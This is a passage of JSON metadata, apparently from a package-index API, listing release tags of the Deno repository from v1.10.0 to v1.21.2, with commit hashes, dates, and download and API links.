%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000